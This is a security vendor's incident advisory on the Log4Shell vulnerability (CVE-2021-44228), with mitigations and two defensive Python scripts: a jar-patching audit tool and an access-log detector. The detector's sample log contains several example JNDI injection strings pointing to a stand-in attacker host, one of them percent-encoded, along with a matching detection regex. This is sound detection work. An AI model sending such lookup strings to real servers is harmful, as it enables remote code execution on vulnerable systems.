UPDATE: SOC ADVISORY - Apache Log4j (CVE-2021-44228)
Incident Report for CyFlare
Resolved
This incident has been resolved.
Posted Mar 01, 2022 - 09:57 EST
Update
Dear Valued Subscriber,

CyFlare has completed a comprehensive audit of its internal and commercial systems, including our SIEM, advanced endpoint, vulnerability scanning, systems management, and SOAR tools. As a result, it is reasonably established that CyFlare is not impacted by the Apache Log4j vulnerabilities identified as CVE-2021-44228 and CVE-2021-45046.

CyFlare does not leverage any of the related components within its applications.

Furthermore, our upstream vendors have provided CyFlare with written statements of no impact. Therefore, there is no remediation required for any CyFlare services at this time. We further validated these statements by conducting internal vulnerability scans and engineering reviews and established that these systems are not affected. We are continuously monitoring the situation and will publish further updates as needed. If you have any questions or concerns, please do not hesitate to reach out to us at socir@cyflare.com.

Thank you,
The CyFlare SOC Team
Posted Jan 04, 2022 - 18:36 EST
Update
We are continuing to monitor for any further issues.
Posted Dec 14, 2021 - 13:09 EST
Monitoring
SOC ADVISORY - *** Apache Log4j (CVE-2021-44228) ***

New incident: Monitoring

Posted Date: 12-13-21

Published Date: 12-10-21

Sources: CISA, Microsoft

DATE(S) ISSUED: 10-18-21

SUBJECT: Apache Log4j (CVE-2021-44228)

SEVERITY: Critical

BASE CVSS Score: 10.0

OVERVIEW: “The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote attacker could exploit this vulnerability to take control of an affected system. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.”

THREAT INTELLIGENCE: There are currently no reports of these vulnerabilities being exploited in

SYSTEMS AFFECTED: Apache Log4j v2.0-beta9 - 2.14.1

TECHNICAL SUMMARY: On December 6th, 2021, Apache released version 2.15.0 of Log4j to address a vulnerability present in versions 2.0-beta9 to 2.14.1. The vulnerability allows remote code execution via JNDI lookups: an attacker who can control log messages or log message parameters can cause the application to load and execute code retrieved from an LDAP server, provided message lookups are enabled.

The attack targets servers running a vulnerable version of Log4j. The attacker places a JNDI lookup string that references an external server in a request header field. That string is passed to Log4j to be logged; Log4j interprets it as a lookup and queries the specified malicious server, which responds with a reference to attacker-supplied Java code hosted externally. The vulnerable server then downloads and executes that code.

This vulnerability is rated critical in severity; users are advised to upgrade all systems running Apache Log4j to 2.15 and apply the required security patches as soon as possible.

IOC Repositories:
https://gist.github.com/superducktoes/9b742f7b44c71b4a0d19790228ce85d8
https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217

MITIGATIONS/RECOMMENDATIONS: Microsoft recommends immediately applying all security patches relating to this vulnerability to remediate it. See the Apache CVE and security advisory for more details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228
https://logging.apache.org/log4j/2.x/security.html

The recommended action is to upgrade Log4j versions from 2.0 to 2.15.0. However, several workarounds exist to temporarily mitigate the vulnerability if this cannot be accomplished.

Log4j versions 2.10 to 2.14.1 allow the system property “log4j2.formatMsgNoLookups” to be set to “true” to disable the message lookup feature that is exploited. The environment variable “LOG4J_FORMAT_MSG_NO_LOOKUPS” can be set to “true” to enforce the same change.

Log4j versions 2.0-beta9 to 2.10 should instead have the JndiLookup class removed from the classpath to temporarily mitigate the vulnerability, for example with “zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class”.
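The two workarounds above can be checked and, where needed, applied in bulk. The following Python script is an added example (not CyFlare's tooling and not Apache's) that mirrors the “zip -q -d …” command using only the standard library: it inventories log4j-core-*.jar files under a directory, reads the version from the file name, reports whether JndiLookup.class is present, and rewrites the jar without it. The sample jars, the temporary directory and the verdict names are assumptions constructed for the demo; the affected range is the advisory's 2.0-beta9 to 2.14.1.

```python
"""Audit log4j-core jars for JndiLookup.class and strip it where needed.

Added example, not CyFlare's or Apache's tooling: a standard-library
equivalent of the advisory's workaround
  zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
The jar names, directory layout and sample jars below are constructed.
"""
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Version is read from the file name, e.g. log4j-core-2.14.1.jar or log4j-core-2.0-beta9.jar.
VERSION_RE = re.compile(r"log4j-core-(\d+\.\d+(?:\.\d+)?(?:-[\w.]+)?)\.jar$")
VULN_LOW, VULN_HIGH = "2.0-beta9", "2.14.1"   # affected range named in the advisory


def version_key(version):
    """Sortable key: numeric parts, then a pre-release tag sorting before the final release."""
    base, _, pre = version.partition("-")
    nums = [int(x) for x in base.split(".")]
    nums += [0] * (3 - len(nums))
    return tuple(nums), ((0, pre) if pre else (1,))


def in_affected_range(version):
    return version_key(VULN_LOW) <= version_key(version) <= version_key(VULN_HIGH)


def audit_jar(path):
    """Report version, presence of JndiLookup.class and a verdict for one jar."""
    m = VERSION_RE.search(os.path.basename(path))
    version = m.group(1) if m else None
    with zipfile.ZipFile(path) as zf:
        has_jndi = JNDI_CLASS in zf.namelist()
    if version is None:
        verdict = "unknown-version"
    elif not in_affected_range(version):
        verdict = "not-in-range"
    elif has_jndi:
        verdict = "vulnerable"
    else:
        verdict = "mitigated"          # affected version, but the class is already gone
    return {"path": path, "version": version, "jndi_lookup": has_jndi, "verdict": verdict}


def scan_tree(root):
    """Audit every log4j-core-*.jar below root."""
    results = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if name.startswith("log4j-core-") and name.endswith(".jar"):
                results.append(audit_jar(os.path.join(dirpath, name)))
    return results


def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (zip entries cannot be deleted in place).
    Returns True if the entry was present and removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        kept = [(info, src.read(info.filename)) for info in src.infolist()
                if info.filename != JNDI_CLASS]
    tmp = path + ".tmp"
    with zipfile.ZipFile(tmp, "w") as dst:
        for info, data in kept:
            dst.writestr(info, data)     # keeps each entry's own compression settings
    os.replace(tmp, path)                # atomic swap; keep a backup in production use
    return True


def build_sample_jars(directory):
    """Construct fake jars (placeholder bytes, no real bytecode) for the demo."""
    samples = {"log4j-core-2.0-beta9.jar": True, "log4j-core-2.12.1.jar": False,
               "log4j-core-2.14.1.jar": True, "log4j-core-2.15.0.jar": True}
    for name, with_jndi in samples.items():
        with zipfile.ZipFile(os.path.join(directory, name), "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")


def run_demo():
    """Build sample jars, audit them, strip the class from vulnerable ones, audit again."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_jars(tmp)
        before = {r["version"]: r["verdict"] for r in scan_tree(tmp)}
        for r in scan_tree(tmp):
            if r["verdict"] == "vulnerable":
                remove_jndi_lookup(r["path"])
        after = {r["version"]: r["verdict"] for r in scan_tree(tmp)}
    return before, after


if __name__ == "__main__":
    before, after = run_demo()
    for version in before:
        print(f"log4j-core-{version}.jar: {before[version]} -> {after[version]}")
```

Two caveats when using this on real hosts: the version comes from the file name only, so a shaded or renamed jar will not be inventoried and the presence of the class is the more reliable signal; and the 2.15.0 jar is reported as out of range because that is the fixed version this advisory names, while the Jan 04 update also lists CVE-2021-45046, so refresh the range constants from the Apache security page rather than hard-coding them. Restart the affected service after stripping the class so the change takes effect.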

STEPS TAKEN BY CYFLARE: CyFlare has detected activity related to this vulnerability across several clients and has notified them appropriately. Custom ATH rules have been created to detect and alert on behavior related to the vulnerability. Stellar Cyber BDS’s threat intelligence sources have also updated IDS signatures to cover this vulnerability, and all exploit attempt detections will alert on events involving “log4j”. CyFlare will continue to track the status of this vulnerability and will provide updates and assistance to our clients regarding this matter.
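The ATH rules and IDS signatures mentioned above are proprietary. As an added example that is not CyFlare's or Stellar Cyber's code, the following Python detector shows the core of such a rule over web-server access logs: it parses combined-format lines, percent-decodes the request, referer and user-agent fields, flags any that carry a JNDI lookup string, and aggregates hits per source address. The log lines, the addresses and the lookup.attacker.example hostname are constructed for the demo.

```python
"""Flag JNDI lookup strings in web-server access logs.

Added example, not CyFlare's ATH rules or Stellar Cyber's IDS signatures:
a minimal detector over Apache/nginx combined-format access logs. The log
lines, IP addresses and hostnames below are constructed for the demo.
"""
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The lookup token Log4j expands; whitespace inside the braces is tolerated by the matcher.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
INSPECTED_FIELDS = ("req", "referer", "ua")

# Constructed sample: one benign line mentioning "jndi" in plain text, one unparsable line,
# and three lines carrying the lookup string in different fields (one percent-encoded).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://lookup.attacker.example/a}"
198.51.100.9 - - [10/Dec/2021:14:02:14 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup.attacker.example%2Fb%7D HTTP/1.1" 404 210 "-" "curl/7.79"
203.0.113.7 - - [10/Dec/2021:14:02:15 +0000] "GET /search?q=jndi+tutorial HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
not a log line at all
192.0.2.44 - - [10/Dec/2021:14:02:16 +0000] "POST /api HTTP/1.1" 500 0 "${JNDI:ldap://lookup.attacker.example/c}" "python-requests/2.26"
"""


def normalize(value):
    """Percent-decode repeatedly (bounded) so an encoded lookup is compared in decoded form."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return an alert dict for a log line carrying a JNDI lookup string, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = [f for f in INSPECTED_FIELDS if JNDI_RE.search(normalize(m.group(f)))]
    if not fields:
        return None
    return {"src_ip": m.group("ip"), "time": m.group("ts"),
            "status": int(m.group("status")), "fields": fields}


def scan_log(text):
    """Run the detector over every line; returns (alerts, unparsed_line_count).
    Unparsable lines are counted rather than silently dropped, so a parser gap is visible."""
    alerts, unparsed = [], 0
    for line in text.splitlines():
        if not line.strip():
            continue
        if LOG_RE.match(line) is None:
            unparsed += 1
            continue
        alert = inspect_line(line)
        if alert:
            alerts.append(alert)
    return alerts, unparsed


def sources_by_hits(alerts):
    """Aggregate alerts per source address, handy for SIEM correlation or a block list."""
    counts = {}
    for a in alerts:
        counts[a["src_ip"]] = counts.get(a["src_ip"], 0) + 1
    return counts


if __name__ == "__main__":
    alerts, unparsed = scan_log(SAMPLE_LOG)
    for a in alerts:
        print(f"{a['time']} {a['src_ip']} status={a['status']} fields={','.join(a['fields'])}")
    print(f"{len(alerts)} alert(s), {unparsed} unparsed line(s), by source: {sources_by_hits(alerts)}")
```

This matches only the plain form of the lookup token; Log4j's nested lookups allow the same token to be written in other ways, so production rules pair a pattern like this with further normalization and, more robustly, with egress monitoring for unexpected outbound LDAP connections from application servers, which does not depend on how the request was written. Note also that a response status of 200 or 404 says nothing about whether the lookup fired, since the string is only interpreted when the application logs it.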

SOURCES:
https://logging.apache.org/log4j/2.x/security.html
https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
Posted Dec 14, 2021 - 13:09 EST
This incident affected: Breach Detection Service.